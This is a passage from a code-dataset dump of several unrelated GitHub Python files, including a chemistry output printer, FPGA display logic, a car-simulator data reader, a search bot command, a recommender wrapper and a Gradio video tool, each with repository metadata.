range(len(frequencies)):\n valstr = ' {:10.7f} {:18.7f} {:18.7f} '.format(\n frequencies[i], eV * frequencies[i], cross_sections[i])\n self.ostream.print_header(valstr)\n\n self.ostream.print_blank()\n\n def print_excited_states(self, adc_drv):\n \"\"\"\n Prints excited state information to output stream.\n\n :param adc_drv:\n The ADC driver.\n \"\"\"\n\n eV = constants.value('Hartree energy in eV')\n\n self.ostream.print_blank()\n text = 'ADC Summary of Results'\n self.ostream.print_header(text)\n self.ostream.print_header('-' * (len(text) + 2))\n self.ostream.print_blank()\n try:\n self.ostream.print_block(\n adc_drv.describe(rotatory_strengths=self.adc_ecd))\n except TypeError:\n if self.adc_ecd is False:\n self.ostream.print_block(adc_drv.describe())\n else:\n error_text = os.linesep + os.linesep\n error_text += '*** Rotatory strengths not available.'\n error_text += os.linesep\n error_text += '*** Please update your adcc version. '\n error_text += 'See https://github.com/adc-connect/adcc. '\n error_text += os.linesep\n raise TypeError(error_text)\n\n if hasattr(adc_drv, 'pe_ptss_correction'):\n text = 'Polarizable Embedding Perturbative Corrections'\n self.ostream.print_blank()\n self.ostream.print_header(text)\n self.ostream.print_header('-' * (len(text) + 2))\n self.ostream.print_blank()\n valstr = '{} | {} | {} | {} | {}'.format('Index',\n 'Excitation Energy',\n 'Uncorrected Energy',\n 'ptSS Correction',\n 'ptLR Correction')\n self.ostream.print_header(valstr)\n valstr = ' {} {} {} {} {}'.format(' # ',\n ' (eV) ',\n ' (ev) ',\n ' (eV) ',\n ' (eV) ')\n self.ostream.print_header(valstr)\n self.ostream.print_header('-' * (len(text) + 32))\n for i in range(len(adc_drv.excitation_energy)):\n valstr = ' {:3d} {:18.7f} {:18.7f} {:18.7f} {:17.7f}'.format(\n i, eV * adc_drv.excitation_energy[i],\n eV * adc_drv.excitation_energy_uncorrected[i],\n eV * adc_drv.pe_ptss_correction[i],\n eV * adc_drv.pe_ptlr_correction[i])\n self.ostream.print_header(valstr)\n\n self.ostream.print_blank()\n\n def print_detailed_states(self, adc_drv):\n \"\"\"\n Prints excited state information to output stream.\n\n :param adc_drv:\n The ADC driver.\n \"\"\"\n\n self.ostream.print_blank()\n text = 'ADC Excited States'\n self.ostream.print_header(text)\n self.ostream.print_header('-' * (len(text) + 2))\n self.ostream.print_blank()\n self.ostream.print_block(\n adc_drv.describe_amplitudes(index_format=\"homolumo\"))\n self.ostream.print_blank()\n","repo_name":"gator-program/gator","sub_path":"src/adcdriver.py","file_name":"adcdriver.py","file_ext":"py","file_size_in_byte":19461,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"5743578155","text":"\"\"\"Tools for seven-segment display banks.\"\"\"\n\nfrom nmigen import *\nfrom nmigen.build import *\nfrom nmigen.hdl.rec import *\n\nfrom nmigen_nexys.core import pwm as pwm_module\nfrom nmigen_nexys.math import lut\n\n\nclass DigitLUT(lut.FunctionLUT):\n \"\"\"Maps decimal digits to their seven-segment encoding.\"\"\"\n\n # 7-bit encoding of segments A-G, indexed by value\n TABLE = [\n 0b0111111,\n 0b0000110,\n 0b1011011,\n 0b1001111,\n 0b1100110,\n 0b1101101,\n 0b1111101,\n 0b0000111,\n 0b1111111,\n 0b1101111,\n ]\n\n def __init__(self, input: Signal):\n super().__init__(\n lambda i: self.TABLE[i] if i < 10 else 0,\n input=input,\n output=Signal(8, name='output'))\n\n\nclass HexDigitLUT(lut.FunctionLUT):\n \"\"\"Maps hexadecimal digits to their seven-segment encoding.\"\"\"\n\n # 7-bit encoding of segments A-G, indexed by value\n TABLE = DigitLUT.TABLE + [\n 0b1110111,\n 0b1111100,\n 0b0111001,\n 0b1011110,\n 0b1111001,\n 0b1110001,\n ]\n\n def __init__(self):\n super().__init__(\n self.TABLE.__getitem__,\n input=Signal(4, name='input'),\n output=Signal(8, name='output'))\n\n\nclass BCDRenderer(Elaboratable):\n \"\"\"Render multiple BCD digits, omitting leading zeros.\"\"\"\n\n def __init__(self, input: [Signal]):\n super().__init__()\n assert len(input) != 0\n self.input = input\n self.start = Signal(reset=0)\n self.output = [Signal(8) for _ in input]\n self.done = Signal(reset=0)\n\n def elaborate(self, _: Platform) -> Module:\n m = Module()\n input = Signal(4 * len(self.input))\n current_input = input[-4:]\n output = Cat(*self.output)\n current_output = Signal(8)\n cursor = Signal(range(len(self.input)), reset=len(self.input) - 1)\n seen_nonzero = Signal()\n m.submodules.lut = lut = DigitLUT(current_input)\n with m.FSM(reset='IDLE'):\n with m.State('IDLE'):\n with m.If(self.start):\n m.d.sync += input.eq(Cat(*self.input))\n m.d.sync += cursor.eq(cursor.reset)\n m.d.sync += seen_nonzero.eq(0)\n m.next = 'CONVERT'\n with m.State('CONVERT'):\n is_zero = (current_input == 0).bool()\n leading_zero = ~seen_nonzero.bool() & is_zero\n blank_zero = leading_zero & (cursor != 0).bool()\n with m.If(blank_zero):\n m.d.comb += current_output.eq(0)\n with m.Else():\n m.d.comb += current_output.eq(lut.output)\n m.d.sync += cursor.eq(cursor - 1)\n m.d.sync += seen_nonzero.eq(seen_nonzero | ~is_zero)\n with m.If(cursor == 0):\n m.next = 'DONE'\n m.d.sync += self.done.eq(1)\n m.d.sync += input.eq(input << 4)\n m.d.sync += output.eq(Cat(current_output, output[:-8]))\n with m.State('DONE'):\n m.d.sync += self.done.eq(0)\n m.next = 'IDLE'\n return m\n\n\nclass DisplayBank(Record):\n \"\"\"Output signal record for a bank of eight common-anode displays.\"\"\"\n\n _LAYOUT = Layout([\n ('segments', 8),\n ('anodes', 8),\n ])\n\n def __init__(self, **kwargs):\n super().__init__(self._LAYOUT, fields=kwargs)\n\n\nclass SingleDisplayValue(Record):\n \"\"\"Request record for the pattern and PWM duty cycle for a single display.\n\n This specifies how ArrayDisplayMultiplexer should drive one of the displays in\n its display bank.\n \"\"\"\n\n _LAYOUT = Layout([\n ('segments', 8),\n ('duty_cycle', 8),\n ])\n\n def __init__(self, **kwargs):\n super().__init__(self._LAYOUT, fields=kwargs)\n\n\nclass DisplayMultiplexer(Elaboratable):\n\n def __init__(self, output: DisplayBank,\n num_segments: int = 8, pwm_width: int = 8):\n super().__init__()\n self.output = output\n self.num_segments = num_segments\n self.pwm_width = pwm_width\n self.segments = Signal(8)\n self.duty_cycle = Signal(pwm_width)\n self.select = Signal(range(num_segments), reset=0)\n\n def elaborate(self, _: Platform) -> Module:\n m = Module()\n # Output data + PWM to the display selected by ``select``\n m.submodules.pwm = pwm = pwm_module.PWM(Signal(self.pwm_width))\n m.d.comb += pwm.duty_cycle.eq(self.duty_cycle)\n m.d.comb += self.output.segments.eq(self.segments)\n for i in range(self.num_segments):\n with m.If((self.select == i) & self.segments.any()):\n m.d.comb += self.output.anodes[i].eq(pwm.output)\n with m.Else():\n m.d.comb += self.output.anodes[i].eq(0)\n # Let the PWM run for 8 steps per display. The resulting refresh rate\n # should be 100 MHz / 256 / 8 ~= 50 kHz.\n strobe_counter = Signal(range(8), reset=0)\n with m.If(pwm.strobe):\n m.d.sync += strobe_counter.eq(strobe_counter + 1)\n with m.If(strobe_counter == 7):\n m.d.sync += self.select.eq(self.select + 1)\n return m\n\n\nclass ArrayDisplayMultiplexer(Elaboratable):\n \"\"\"Multiplex a bank of eight common-anode seven-segment displays.\n\n Arbitrary patterns are supported and can be generated by BCDRenderer. The\n multiplexer also supports individual PWM duty cycle for each display in the\n bank.\n \"\"\"\n\n def __init__(self, inputs: Array, output: DisplayBank):\n super().__init__()\n assert len(inputs) == 8\n self.inputs = inputs\n self.output = output\n\n def elaborate(self, _: Platform) -> Module:\n m = Module()\n m.submodules.mux = mux = DisplayMultiplexer(self.output)\n m.d.comb += mux.segments.eq(self.inputs[mux.select].segments)\n m.d.comb += mux.duty_cycle.eq(self.inputs[mux.select].duty_cycle)\n return m\n\n\nclass DisplayMultiplexerDemo(Elaboratable):\n \"\"\"Simple demo for the display multiplexer.\n\n This demo displays a static pattern. Each display in the bank displays its\n index (in decimal) and uses the same index as its PWM duty cycle (in\n increments of 12.5%).\n \"\"\"\n\n def __init__(self, segments, anodes):\n super().__init__()\n self.segments = segments\n self.anodes = anodes\n\n def elaborate(self, _: Platform) -> Module:\n m = Module()\n display_values = []\n for i in range(8):\n val = SingleDisplayValue(segments=Signal(8), duty_cycle=Signal(8))\n m.d.comb += val.segments.eq(DigitLUT.TABLE[i])\n m.d.comb += val.duty_cycle.eq((i * 255) // 7)\n display_values.append(val)\n # Display the output\n display = DisplayBank(segments=Signal(8), anodes=Signal(8))\n m.d.comb += self.segments.eq(display.segments)\n m.d.comb += self.anodes.eq(display.anodes)\n m.submodules.dispmux = ArrayDisplayMultiplexer(\n inputs=Array(display_values),\n output=display)\n return m\n","repo_name":"sjolsen/nmigen-nexys","sub_path":"display/seven_segment.py","file_name":"seven_segment.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"39222422216","text":"import mmap\nfrom ctypes import *\nimport binascii\nimport re\nimport numpy as np\nfrom PIL import Image\nimport PIL.Image as img\nfrom cv2 import cv2 as cv\n\nclass Position(Structure):\n _fields_= [(\"x\", c_float),(\"y\", c_float),(\"z\",c_float)]\n\nclass PC_info(Structure):\n _fields_= [(\"point_position\",Position),(\"padding\",c_int)]\n\nclass PointCloudPackage(Structure):\n _fields_= [(\"dataLength\", c_int),(\"pointCloudInfo\", POINTER(PC_info))]\n\nclass pixel_structure(Structure):\n _fields_= [(\"R\",c_int8),(\"G\",c_int8),(\"B\",c_int8),(\"A\",c_int8)]\n\nclass VideoStreamPack(Structure):\n _fields_= [(\"data\", POINTER(POINTER(pixel_structure))),(\"height\",c_int)\n ,(\"width\", c_int), (\"num_camera\", c_int)]\n\nclass car_info(Structure):\n _fields_= [(\"speed\", c_float),(\"car_position_x\", c_float)\n ,(\"car_position_y\", c_float), (\"car_position_z\", c_float)]\n\nclass AlgInformation(Structure):\n _fields_= [(\"steeringMechanism_TuringRate\", c_float),(\"brakingMechanism_BrakingRate\", c_float)\n ,(\"engineMechanism_ThrottleRate\", c_float), (\"message\", c_char*200)]\n\nclass BoundingBoxInfomation:\n topLeft = []\n heightWidth = []\n\nPoints = []\n\nc_dll = cdll.LoadLibrary(\"SM_Access.dll\")\ng_carPos = c_dll.GetCarPosition\ng_carPos.restype = Position\ng_PCData = c_dll.GetPointCloudData\ng_PCData.restype = PointCloudPackage\ng_CameraData =c_dll.GetCarCameraData\ng_CameraData.restype = VideoStreamPack\ng_FreePointCloudData = c_dll.FreePointCloudMemary\ng_freeMemary = c_dll.FreeAllocatedMemary\ng_CarInformation = c_dll.GetCarInformation\ng_CarInformation.restype = car_info\ng_BoundingBoxInfomation = c_dll.GetBoundingBoxInfo\nw_CarControllerCommand = c_dll.writeAlgControllerCommand\n\n\nhasShown = 0\n\ndef _packeageTestFunction():\n \n buff1 = g_carPos()\n #print(\"Car position: \",buff1.x,\" \",buff1.y,\" \",buff1.z)\n\n PC_Origin = []\n for i in range(12):\n buff2 = g_PCData()\n \n\n PC_Origin = np.ctypeslib.as_array(cast(buff2.pointCloudInfo, POINTER(c_float))\n , (buff2.dataLength, 4))\n\n g_FreePointCloudData()\n \n \n #print(\"Points: \",buff2.dataLength)\n\n buff3 = g_CameraData()\n\n data = []\n img_bytes = []\n for i in range(buff3.num_camera):\n img_origin = np.ctypeslib.as_array(cast(buff3.data[i], POINTER(c_ubyte))\n , (buff3.height, buff3.width, 4))\n #img_buf = np.delete(img_origin, -1, axis=1)\n img_bytes.append(img_origin)\n\n global hasShown\n if(hasShown == 2):#change to 0 when debug\n t_image = Image.fromarray(img_bytes[0]).convert('RGB')\n Image._show(Image.fromarray(np.array(cv.cvtColor(np.array(t_image),cv.COLOR_BGR2RGB))))\n t_image1 = Image.fromarray(img_bytes[1]).convert('RGB')\n Image._show(Image.fromarray(np.array(cv.cvtColor(np.array(t_image1),cv.COLOR_BGR2RGB))))\n t_image2 = Image.fromarray(img_bytes[2]).convert('RGB')\n Image._show(Image.fromarray(np.array(cv.cvtColor(np.array(t_image2),cv.COLOR_BGR2RGB))))\n hasShown = 1\n \n t_image = Image.fromarray(img_bytes[0])\n cv.imshow(\"Camera1\", cv.resize(np.array(t_image), (320,240), interpolation=cv.INTER_AREA))\n t_image1 = Image.fromarray(img_bytes[1])\n cv.imshow(\"Camera2\", cv.resize(np.array(t_image1), (320,240), interpolation=cv.INTER_AREA))\n t_image2 = Image.fromarray(img_bytes[2])\n cv.imshow(\"Camera3\", cv.resize(np.array(t_image2), (320,240), interpolation=cv.INTER_AREA))\n cv.waitKey(1)\n \n Points = []\n \n g_freeMemary()\n '''\n for i in range(buff3.num_camera):\n for j in range(buff3.width * buff3.height):\n data.append(buff3.data[i][j])\n \n print(\"Data: \",data.__len__())\n \n\n Points = []\n data = []\n '''\n\n\"\"\"Return the Car camera gray image data and the car position\"\"\"\ndef aquireImageData(isGray = False, hasBoundingBox = False):\n out_CarPosition = []\n out_CameraImage = []\n\n buff1 = g_carPos()\n out_CarPosition = [buff1.x,buff1.y,buff1.z]\n\n buff3 = g_CameraData()\n img_bytes = []\n for i in range(buff3.num_camera):\n img_origin = np.ctypeslib.as_array(cast(buff3.data[i], POINTER(c_ubyte))\n , (buff3.height, buff3.width, 4))\n #img_buf = np.delete(img_origin, -1, axis=1)\n img_bytes.append(img_origin)\n t_image1 = Image.fromarray(img_bytes[0]).convert('RGB')\n t_image2 = Image.fromarray(img_bytes[1]).convert('RGB')\n t_image3 = Image.fromarray(img_bytes[2]).convert('RGB')\n\n if isGray:\n out_CameraImage = [np.array(cv.cvtColor(np.array(t_image1),cv.COLOR_BGR2GRAY)),\n np.array(cv.cvtColor(np.array(t_image2),cv.COLOR_BGR2GRAY)),\n np.array(cv.cvtColor(np.array(t_image3),cv.COLOR_BGR2GRAY))]\n else:\n out_CameraImage = [np.array(cv.cvtColor(np.array(t_image1),cv.COLOR_BGR2RGB)),\n np.array(cv.cvtColor(np.array(t_image2),cv.COLOR_BGR2RGB)),\n np.array(cv.cvtColor(np.array(t_image3),cv.COLOR_BGR2RGB))]\n \n if(hasBoundingBox):\n DatasetInfo = dict()\n buffer = create_string_buffer(4*10000)\n g_BoundingBoxInfomation(buffer)\n str_data = str(buffer.value,encoding='utf-8')\n camera_data = str_data.split('\\n')[:-1]\n for line in camera_data:\n line_info = re.split(\" |,|;\",line)\n DatasetInfo[line_info[0][6]] = []\n for i in range(int((len(line_info)-1)/4)):\n DatasetInfo[line_info[0][6]].append([int(float(line_info[4*i+1])),int(float(line_info[4*i+2])),\n int(float(line_info[4*i+3])),int(float(line_info[4*i+4]))])\n\n g_freeMemary()\n\n if(not hasBoundingBox):\n return out_CarPosition,out_CameraImage\n else:\n return [out_CarPosition,out_CameraImage,DatasetInfo]\n\n\n\"\"\"Return the Lidar point cloud data and the car position\"\"\"\ndef aquirePointCloudData():\n out_CarPosition = []\n out_PointCloud = []\n\n buff1 = g_carPos()\n out_CarPosition = [buff1.x,buff1.y,buff1.z]\n\n for i in range(12):\n buff2 = g_PCData()\n out_CarPosition = np.ctypeslib.as_array(cast(buff2.pointCloudInfo, POINTER(c_float))\n , (buff2.dataLength, 4))\n out_CarPosition = np.delete(out_CarPosition, -1, axis=1)\n\n g_FreePointCloudData()\n\n return out_CarPosition,out_PointCloud\n\n\"\"\"Return the car position\"\"\"\ndef aquireCarPosition():\n out_CarPosition = []\n\n buff1 = g_carPos()\n out_CarPosition = [buff1.x,buff1.y,buff1.z]\n\n return out_CarPosition\n\ndef aquireCarInformation():\n buff1 = g_CarInformation()\n\n out_speed = buff1.speed\n return out_speed\n\ndef writeAlgControllerSharedMemary(in_command):\n writeInfo = AlgInformation()\n writeInfo.steeringMechanism_TuringRate = in_command[0]\n writeInfo.brakingMechanism_BrakingRate = in_command[1]\n writeInfo.engineMechanism_ThrottleRate = in_command[2]\n w_CarControllerCommand(writeInfo)\n\nif __name__ == \"__main__\":\n while True:\n #aquireDatasetInfomation()\n #_packeageTestFunction()\n #print(aquireCarInformation())\n aquireImageData()\n \"\"\"_,img = aquireImageData()\n Image.fromarray(img[0]).save(\"Output1.png\")\n Image.fromarray(img[1]).save(\"Output2.png\")\n Image.fromarray(img[2]).save(\"Output3.png\")\"\"\"\n #print(aquireCarPosition())\n #print(aquirePointCloudData())","repo_name":"GGzhangBOY/AlgContainer","sub_path":"DataReceiver.py","file_name":"DataReceiver.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37422228481","text":"import jieba\nimport os, sys\n\nsys.path.append(os.getcwd())\nfrom summary import SummaryAcquirer\nfrom comments.category import MovieCategoryAcquirer\nfrom jieba import analyse\n\n\nclass KeywordsAnalyzer:\n def __init__(self, every_summary):\n global content\n self.every_summary = every_summary\n\n # 清洗数据\n def handle_word(self):\n hello = []\n # 分词\n for m in self.every_summary.values():\n after_cut = jieba.lcut(m, cut_all=False)\n # 去停用词\n for i in set(after_cut):\n if re.match(r'\\w+', i) and i not in content:\n hello.append(i)\n return hello\n\n # 关键词分析\n def text_rank(self):\n for m, n in zip(self.every_summary.keys(), self.every_summary.values()):\n self.keywords = analyse.textrank(n,\n topK=10,\n withWeight=False,\n allowPOS=('ns', 'n', 'vn', 'n'))\n print(m, self.keywords)\n return self.keywords\n\n\nif __name__ == '__main__':\n cat_list = MovieCategoryAcquirer().acquire_category()\n category_obj = cat_list[0]\n s = SummaryAcquirer(category_obj)\n k = KeywordsAnalyzer(s.get_summary())\n kewords_dict = k.text_rank()\n","repo_name":"Bonkkerrs/BUSS1301-Python-Team-Project","sub_path":"keywords/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38446128635","text":"\"\"\"Duckduckgo bot command\"\"\"\nimport urllib.parse\nfrom typing import Optional, List\nimport bs4\nimport requests\n\nfrom sadbot.command_interface import CommandInterface, BOT_HANDLER_TYPE_MESSAGE\nfrom sadbot.message import Message\nfrom sadbot.bot_action import BotAction, BOT_ACTION_TYPE_REPLY_TEXT\n\n\nclass DdgBotCommand(CommandInterface):\n \"\"\"This is the Duckduckgo bot command class\"\"\"\n\n @property\n def handler_type(self) -> int:\n \"\"\"Returns the type of event handled by the command\"\"\"\n return BOT_HANDLER_TYPE_MESSAGE\n\n @property\n def command_regex(self) -> str:\n \"\"\"Returns the regex for matching Duckduckgo commands\"\"\"\n return r\"((!|\\.)([Dd]{2}[Gg])).*\"\n\n def get_reply(self, message: Optional[Message] = None) -> Optional[List[BotAction]]:\n \"\"\"Returns reply for Duckduckgo command\"\"\"\n if message is None or message.text is None:\n return None\n query = \" \".join(message.text.split(\" \")[1:])\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)\"\n + \"Gecko/20100101 Firefox/98.0\",\n }\n url = \"https://html.duckduckgo.com/html/\"\n data = f\"q={urllib.parse.quote(query)}&b=&kl=&df=\"\n try:\n req = requests.post(url, headers=headers, data=data)\n soup = bs4.BeautifulSoup(req.text, \"html.parser\")\n except requests.RequestException:\n return None\n results = soup.find_all(\"div\", attrs={\"class\": \"result\"})\n counter = 1\n answer = f\"Results from [Duck Duck Go](https://duckduckgo.com) for {query}:\\n\"\n for result in results:\n s_result = result.find_next(\"a\", attrs={\"class\": \"result__a\"})\n link = s_result.attrs.get(\"href\")\n title = s_result.text\n link = link.replace(\"https://\", \"\")\n answer += f\"{counter}. [{title}]({urllib.parse.quote(link)})\\n\"\n counter += 1\n return [\n BotAction(\n BOT_ACTION_TYPE_REPLY_TEXT,\n reply_text=answer,\n reply_text_parse_mode=\"Markdown\",\n )\n ]\n","repo_name":"hydrastro/sadbot","sub_path":"sadbot/commands/ddg.py","file_name":"ddg.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"28748880315","text":"class Solution:\n def removeOuterParentheses(self, S):\n stack = []\n output = \"\"\n start, end = 0, 0\n for char in S:\n if char == '(':\n stack.append(char)\n else:\n stack = stack[:-1]\n if len(stack) == 0:\n p = self.removeOuter(S, start, end)\n # print start,end\n # print p\n output += p\n start = end + 1\n end += 1\n \n return output\n def removeOuter(self, S, start, end):\n return S[start + 1:end]\n","repo_name":"sksanjiv77/leetcode","sub_path":"1021-remove-outermost-parentheses/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22442638071","text":"while True:\n try:\n n = int(input('Digite o valor que você deseja saber o fatorial: '))\n except:\n print('\\nValor inválido!\\n')\n n = 0\n if (n <= 0 or n >= 16):\n print('O valor deve ser um número inteiro positivo entre entre 0 16!\\n')\n elif(0 Union[MyFMRegressor]:\n if algorithm == Algorithm.BayesianFactorizationMachine:\n return MyFMRegressor(rank=10)\n else:\n print(\"Exception: The algorithm could not be identified.\")\n raise Exception\n\n\ndef fit_and_predict(train: pd.DataFrame, test: pd.DataFrame, algorithm: Algorithm) -> Tuple[pd.DataFrame, float, float]:\n # choose model\n print(f\"Evaluating myfm algorithm {algorithm.name}.\")\n recommender = get_base_model(algorithm)\n\n # data has to be one-hot encoded\n ohe = OneHotEncoder(handle_unknown='ignore')\n # start fitting\n fit_start_time = time.time()\n recommender.fit(ohe.fit_transform(train.drop(columns=[\"rating\"])), train[\"rating\"].values, n_iter=200,\n n_kept_samples=200)\n fit_duration = time.time() - fit_start_time\n print(f\"Algorithm fitted in {fit_duration} seconds.\")\n\n # predict\n predict_start_time = time.time()\n prediction = recommender.predict(ohe.transform(test.drop(columns=[\"rating\"])))\n predict_duration = time.time() - predict_start_time\n print(f\"Algorithm predicted in {predict_duration} seconds.\")\n\n return prediction, fit_duration, predict_duration\n\n\ndef train_best_model(data: pd.DataFrame, algorithm: Algorithm) -> MyFMRegressor:\n # train the best recommender based on predictions\n recommender = get_base_model(algorithm)\n if recommender is not None:\n print(f\"Training best algorithm {algorithm.name} on supplied data.\")\n ohe = OneHotEncoder(handle_unknown='ignore')\n recommender.fit(ohe.fit_transform(data.drop(columns=[\"rating\"])), data[\"rating\"].values, n_iter=200,\n n_kept_samples=200)\n print(f\"Done.\")\n return recommender\n else:\n print(f\"Exception: Algorithm {algorithm.name} could not be built.\")\n raise Exception\n","repo_name":"ISG-Siegen/camels","sub_path":"camels/wrapper_myfm.py","file_name":"wrapper_myfm.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"4001111724","text":"from tensorflow.python.data.ops import dataset_ops\nfrom tensorflow.python.data.ops import directed_interleave_op\nfrom tensorflow.python.data.util import structure\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import tensor_spec\nfrom tensorflow.python.types import data as data_types\n\n\ndef _choose_from_datasets( # pylint: disable=unused-private-name\n datasets, choice_dataset, stop_on_empty_dataset=True\n):\n \"\"\"See `Dataset.choose_from_datasets()` for details.\"\"\"\n\n if not datasets:\n raise ValueError(\"Invalid `datasets`. `datasets` should not be empty.\")\n if not isinstance(choice_dataset, data_types.DatasetV2):\n raise TypeError(\n \"Invalid `choice_dataset`. `choice_dataset` should be a \"\n f\"`tf.data.Dataset` but is {type(choice_dataset)}.\"\n )\n if not structure.are_compatible(\n choice_dataset.element_spec, tensor_spec.TensorSpec([], dtypes.int64)\n ):\n raise TypeError(\n \"Invalid `choice_dataset`. Elements of `choice_dataset` \"\n \"must be scalar `tf.int64` tensors but are \"\n f\"{choice_dataset.element_spec}.\"\n )\n # Replicates the `choice_dataset` component so that each split makes choices\n # independently. This avoids the need for prohibitively expensive\n # cross-split coordination.\n # pylint: disable=protected-access\n choice_dataset = dataset_ops._apply_rewrite(\n choice_dataset, \"replicate_on_split\"\n )\n return directed_interleave_op._directed_interleave( # pylint: disable=protected-access\n choice_dataset, datasets, stop_on_empty_dataset\n )\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/data/ops/choose_from_datasets_op.py","file_name":"choose_from_datasets_op.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"25106502118","text":"from typing import Callable, Dict\nfrom .model import DataSchema, DataType\nimport pandas as pd\n\nclass ValidationError(Exception):\n pass\n\ndef base_validate(v, _type):\n if isinstance(v, _type):\n return True\n elif isinstance(v, str):\n try:\n return _type(v)\n except ValueError:\n raise ValidationError\n\ndef validate_str(v):\n if isinstance(v, str):\n return v\n elif isinstance(v, bytes):\n v:bytes \n return v.decode()\n else:\n raise ValidationError\n\ndef dummy_validate(v):\n return v\n\nvalidate_int = lambda x: base_validate(x, int)\nvalidate_float = lambda x: base_validate(x, float)\nvalidate_bit = lambda x: base_validate(x, bool)\n\n\nvalidator_map:Dict[DataType, Callable] = {\n DataType.STRING: validate_str,\n DataType.INTEGER: validate_int,\n DataType.FLOAT: validate_float,\n DataType.BIT: validate_bit,\n DataType.DATE: dummy_validate,\n DataType.DATETIME: dummy_validate\n}\n\ndef validate_column_list(df: pd.DataFrame, schema: DataSchema):\n try:\n assert set([f.name for f in schema.fields]).issubset(df.columns)\n except AssertionError:\n raise ValidationError\n\ndef validate(df: pd.DataFrame, schema: DataSchema):\n validate_column_list(df, schema)\n for rec in df.itertuples(index=False):\n for f in schema.fields:\n try:\n val = getattr(rec, f.name)\n validator = validator_map[f.type_]\n validator(val)\n except AttributeError:\n raise ValidationError\n ","repo_name":"andremuench/data_onboarding","sub_path":"components/svc/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29130857693","text":"\"\"\"Duplicate Frames Report feature UI and event handlers\"\"\"\nimport os\nfrom typing import Callable\nimport gradio as gr\nfrom webui_utils.simple_config import SimpleConfig\nfrom webui_utils.simple_icons import SimpleIcons\nfrom webui_tips import WebuiTips\nfrom webui_utils.auto_increment import AutoIncrementDirectory\nfrom interpolate_engine import InterpolateEngine\nfrom tabs.tab_base import TabBase\nfrom deduplicate_frames import DeduplicateFrames\n\nclass DuplicateFramesReport(TabBase):\n \"\"\"Encapsulates UI elements and events for the Duplicate Frames Report feature\"\"\"\n def __init__(self,\n config : SimpleConfig,\n engine : InterpolateEngine,\n log_fn : Callable):\n TabBase.__init__(self, config, engine, log_fn)\n\n def render_tab(self):\n \"\"\"Render tab into UI\"\"\"\n min_threshold = self.config.deduplicate_settings[\"min_threshold\"]\n max_threshold = self.config.deduplicate_settings[\"max_threshold\"]\n default_threshold = self.config.deduplicate_settings[\"default_threshold\"]\n threshold_step = self.config.deduplicate_settings[\"threshold_step\"]\n def_max_dupes = self.config.deduplicate_settings[\"max_dupes_per_group\"]\n max_lines = self.config.deduplicate_settings[\"max_lines\"]\n max_max_dupes = self.config.deduplicate_settings[\"max_max_dupes\"]\n with gr.Tab(\"Duplicate Frames Report\"):\n gr.Markdown(SimpleIcons.DOCUMENT + \"Detect and report duplicate PNG frame files\")\n with gr.Row():\n input_path_text = gr.Text(max_lines=1, label=\"Input PNG Files Path\",\n placeholder=\"Path on this server to the PNG files to be reported on\")\n with gr.Row():\n threshold = gr.Slider(value=default_threshold, minimum=min_threshold,\n maximum=max_threshold, step=threshold_step, label=\"Detection Threshold\")\n max_dupes = gr.Slider(value=def_max_dupes, minimum=0, maximum=max_max_dupes, step=1,\n label=\"Maximum Duplicates Per Group (0 = no limit, 1 = no duplicates allowed)\")\n with gr.Row():\n report_button = gr.Button(\"Create Report\", variant=\"primary\")\n with gr.Row():\n file_output = gr.File(type=\"file\", file_count=\"multiple\", label=\"Download\",\n visible=False)\n with gr.Row():\n output_text = gr.Textbox(label=\"Report\", max_lines=max_lines, interactive=False)\n with gr.Accordion(SimpleIcons.TIPS_SYMBOL + \" Guide\", open=False):\n WebuiTips.duplicates_report.render()\n report_button.click(self.create_report, inputs=[input_path_text, threshold, max_dupes],\n outputs=[file_output, output_text])\n\n def create_report(self,\n input_path : str,\n threshold : int,\n max_dupes : int):\n \"\"\"Create Report button handler\"\"\"\n if input_path:\n try:\n report = DeduplicateFrames(None,\n input_path,\n None,\n threshold,\n max_dupes,\n None,\n self.log).invoke_report(suppress_output=True)\n\n base_output_path = self.config.directories[\"output_deduplication\"]\n output_path, run_index = AutoIncrementDirectory(base_output_path).next_directory(\n \"run\")\n output_basename = \"duplicate_frames_report\"\n self.log(f\"creating duplicate frames report at {output_path}\")\n\n info_file = os.path.join(output_path, output_basename + str(run_index) + \".txt\")\n with open(info_file, \"w\", encoding=\"UTF-8\") as file:\n file.write(report)\n return gr.update(value=[info_file], visible=True), gr.update(value=report,\n visible=True)\n\n except RuntimeError as error:\n message = \\\nf\"\"\"Error creating report:\n{error}\"\"\"\n return gr.update(value=None, visible=False), gr.update(value=message, visible=True)\n","repo_name":"jhogsett/EMA-VFI-WebUI","sub_path":"tabs/dedupe_report_ui.py","file_name":"dedupe_report_ui.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"18"} +{"seq_id":"39994121418","text":"from sqlalchemy import Column, Integer, String, BigInteger\n\nfrom pydantic import BaseModel\nfrom typing import Optional, List\nfrom entity import Base\n\n\"\"\"\n文章列表\n\"\"\"\n\n\n# 文章 的数据库对象 sqlalchemy模型\nclass DbContent(Base):\n __tablename__ = 